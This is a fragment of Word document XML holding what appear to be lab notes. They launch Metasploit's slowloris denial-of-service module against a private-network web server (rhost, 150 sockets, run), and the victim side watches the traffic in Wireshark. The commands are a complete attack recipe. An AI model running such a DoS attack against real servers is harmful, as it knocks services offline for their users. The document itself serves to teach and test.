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3685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:r>
        <w:t>Commands on Attacker Side:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>search dos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/dos/http/slowloris</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>msf5 auxiliary(dos/http/slowloris) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>set rhost 192.168.0.105</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>set sockets 150</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685"/>
    <w:p w:rsidR="00483685" w:rsidRDefault="00483685" w:rsidP="00483685">
      <w:r>
        <w:t xml:space="preserve">Victim </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t>ip.addr == attacker.ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0B3C" w:rsidRDefault="00CF3CEF"/>
    <w:sectPr w:rsidR="00FB0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NTc2tzAyMLW0NLZU0lEKTi0uzszPAykwrAUA/7xhjywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="008D4799"/>
    <w:rsid w:val="001271BD"/>
    <w:rsid w:val="00483685"/>
    <w:rsid w:val="008D4799"/>
    <w:rsid w:val="00CB7553"/>
    <w:rsid w:val="00CF3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40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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-07T13:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-07T13:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>